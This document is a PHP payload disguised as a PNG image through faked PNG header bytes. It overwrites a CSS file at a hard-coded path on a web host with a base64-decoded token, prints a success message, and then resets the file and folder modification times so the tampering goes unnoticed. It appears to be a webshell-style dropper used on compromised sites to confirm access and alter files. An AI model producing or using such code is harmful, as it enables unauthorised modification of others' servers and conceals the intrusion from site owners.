\x89\x50\x4E\x47\x0D\x0A\x1A\x0A PNG  \x89\x50\x4E\x47\x0D\x0A\x1A\x0A ";$filepath = "/home/boa1684427/boat1.maldiviana.com/docs_2021_12_23_14-33-38/maldiviana.com.css"; $dirpath = @dirname($filepath); $tm = @filemtime($filepath);$mf = @fopen($filepath, "w"); if ($mf) { $txt = base64_decode("MTM2NjllM2NjMmI0ZjRiNzlhZDM3N2JmZDlkZjJlMzE="); fwrite($mf, $txt); fclose($mf); print("
Edited!
\n
"); } if(file_exists($filepath)) { $txt = file_get_contents($filepath); print(""); if($tm) { @touch($filepath,$tm,$tm); @touch($dirpath,$tm,$tm); } };echo "Result:OK"; echo ""; die;